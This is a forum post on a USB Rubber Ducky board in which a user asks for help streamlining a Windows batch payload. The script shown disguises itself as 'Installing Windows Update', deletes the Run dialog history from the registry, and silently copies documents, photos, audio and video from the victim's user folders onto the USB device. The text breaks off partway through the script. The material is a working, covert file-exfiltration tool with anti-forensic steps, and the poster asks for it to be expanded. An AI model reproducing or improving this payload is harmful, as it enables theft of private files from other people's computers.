Jump to content

A help to simplify playloads

lucaM

By lucaM
in Classic USB Rubber Ducky

 Share

Recommended Posts

lucaM Newbie

lucaM

Posted
Posted

Hello everyone, my name is Luca

I am new to the forum, I am writing for the first time to ask for help, I am not an expert in programming language and I would like to simplify the palyloads that I modified starting from that of hak5.

I followed the instructions below, and everything works correctly:

https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained

- I used ducky-flasher, I chose the original "Twin Duck" firmware.
- Inside the micro sd I created the folder "slurp", the files "d.cmd e.cmd i.vbs", and the file "inject.bin" reported in the guide.

Ok, everything works fine, if there is a .pdf file inside the Documents folder it will be copied inside the USB Rubber Duck.

My goal is to save all the files in the users folder and its subfolders inside the USB Rubber Duck; Target all windows (for now only tested on windows 10)

The extension of the chosen files are:

Documents
.csv .doc .docx .odt .ods .odg .odp .pdf .pps .txt .tex .ltx .rtf .xls .xlsx

Image
.gif .jpg .jpeg .JPEG .png .tiff .psd .webp

Audio
.mp3 .m4a .ogg .wav .wma

Video
.3gp .avi .divx .mp4 .mpeg .ogm .wmv .mov .vob .webm .xvid

 

I tried to edit the file "e.cmd" to be able to save all the files of all user folders, I followed the example found here:

https://forums.hak5.org/topic/42260-need-help-with-passwordgrabber/?page=2

If I enter this command it does not work: 

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.pdf %dst% >>nul)

If instead I use this command everything works correctly, but only one folder at a time (in this case documents) and only one extension at a time (in this case .pdf): 

if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul)

I made many attempts (in my ignorance) at the end "I gave birth" this script that I report below.

Unfortunately I can not write in a single command.

I used multiple commands to copy the folders: "Documents, Desktop, Downloads, Favorites, Pictures, Videos, OneDrive, Music, Searches" of the user using windoes 10).


My question is:

Is there a command to simplify all this?

Thank you for your time 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
)

REM Document extensions
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.png %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xvid %dst% >>nul)

REM Folder to copy Desktop
REM Document extensions
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.png %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.xvid %dst% >>nul)

REM Folder to copy Downloads
REM Document extensions
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.png %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Downloads (xcopy /C /Q /G /Y /S %USERPROFILE%\Downloads\*.xvid %dst% >>nul)

REM Folder to copy Favorites
REM Document extensions
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.png %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Favorites (xcopy /C /Q /G /Y /S %USERPROFILE%\Favorites\*.xvid %dst% >>nul)

REM Folder to copy Pictures
REM Document extensions
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.rtf %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.xls %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.xlsx %dst% >>nul)

REM Image extensions
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.gif %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.jpg %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.jpeg %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.JPEG %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.png %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.tiff %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.psd %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.webp %dst% >>nul)

REM audio extensions
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.mp3 %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.m4a %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.ogg %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.wav %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.wma %dst% >>nul)

REM video extensions
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.3gp %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.avi %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.divx %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.mp4 %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.mpeg %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.ogm %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.wmv %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.mov %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.vob %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.webm %dst% >>nul)
if Exist %USERPROFILE%\Pictures (xcopy /C /Q /G /Y /S %USERPROFILE%\Pictures\*.xvid %dst% >>nul)

REM Folder to copy Videos
REM Document extensions
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.csv %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.doc %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.docx %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.odt %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.ods %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.odg %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.odp %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.pdf %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.pps %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.txt %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.tex %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.ltx %dst% >>nul)
if Exist %USERPROFILE%\Videos (xcopy /C /Q /G /Y /S %USERPROFILE%\Videos\*.rtf %dst% >>nul)
